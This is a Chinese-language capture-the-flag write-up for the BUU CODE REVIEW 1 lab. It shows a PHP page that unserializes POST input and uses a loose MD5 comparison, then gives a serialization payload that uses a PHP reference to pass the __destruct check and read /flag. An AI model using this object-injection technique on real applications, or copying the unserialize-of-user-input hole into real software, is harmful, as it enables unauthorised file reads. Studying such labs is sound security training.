BUU CODE REVIEW 1

0x01 题目分析

<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/10/6
 * Time: 8:04 PM
 */

highlight_file(__FILE__); //高亮显示当前页面源代码

class BUU {
   public $correct = "";
   public $input = "";

   public function __destruct() {　　　//析构方法　
       try {
           $this->correct = base64_encode(uniqid());   //uniqid() 函数基于以微秒计的当前时间，生成一个唯一的 ID
           if($this->correct === $this->input) {
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
}

if($_GET['pleaseget'] === '1') {
    if($_POST['pleasepost'] === '2') {
        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
            unserialize($_POST['obj']);
        }
    }
}

PHP析构方法：http://c.biancheng.net/view/7504.html

PHPuniqid()函数：https://www.w3school.com.cn/php/func_misc_uniqid.asp

MD5相等但值不相等：https://blog.csdn.net/qq_45320164/article/details/115377084

0x02 重点分析

前面的条件满足时都不是很难，最重要的是最后的反序列化问题。

因为使用uniqid()函数得出的值是以微秒为单位来进行变化的，所以使用普通的方法很难实现（除非你的手速快过微秒，O(∩_∩)O哈哈~）。

通过序列化构造方法:

<?php
class BUU {
    public $correct = "";
    public $input = "";

    public function __destruct() {
        try {
            $this->correct = base64_encode(uniqid());
            if($this->correct === $this->input) {
                echo file_get_contents("/flag");
            }
        } catch (Exception $e) {
        }
    }
}
$a = new BUU();
$a->input=&$a->correct;
echo serialize($a);

因为$a->correct的值是随时变化的，所以要在前面添加一个&符号，表引用。

PHP中引用符号（&）的使用介绍：https://blog.csdn.net/bigbigcao/article/details/82393289

0x03 结尾

最后将对象$a的值赋值到obj中得到flag